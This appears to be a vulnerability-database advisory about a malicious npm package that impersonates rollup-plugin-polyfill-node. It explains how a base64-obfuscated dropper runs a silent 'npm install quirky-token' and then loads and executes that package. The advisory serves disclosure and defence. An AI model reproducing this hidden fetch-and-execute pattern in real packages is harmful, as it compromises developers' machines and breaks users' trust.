rollup-runtime-polyfill-core @0.13.7
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6372
Ecosystem
npm
Summary
Package name rollup-runtime-polyfill-core impersonates the legitimate rollup-plugin-polyfill-node and even copies that project's GitHub URL into its own package.json repository.url . The shipped dist/index.js reproduces the legitimate plugin's code with an appended dropper: on module load, ValidateSvgModule() decodes a base64 string to the shell command npm install quirky-token --no-save --silent --no-audit --no-fund and spawns it; on child close, a second base64 string decodes to quirky-token , which is then require() d and invoked. Any project that requires this rollup plugin silently downloads and executes arbitrary code from the attacker-controlled quirky-token package with the consumer's privileges. The shell command and module name are base64-encoded specifically to evade casual code review and basic static scanners — there is no legitimate reason for a rollup plugin to obfuscate an npm install invocation.
Source: amazon-inspector (e1923adcd8dc53c5f68d2b6f1ef453f5dc52a71fcb2b9e9db502d308e5ef4311)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.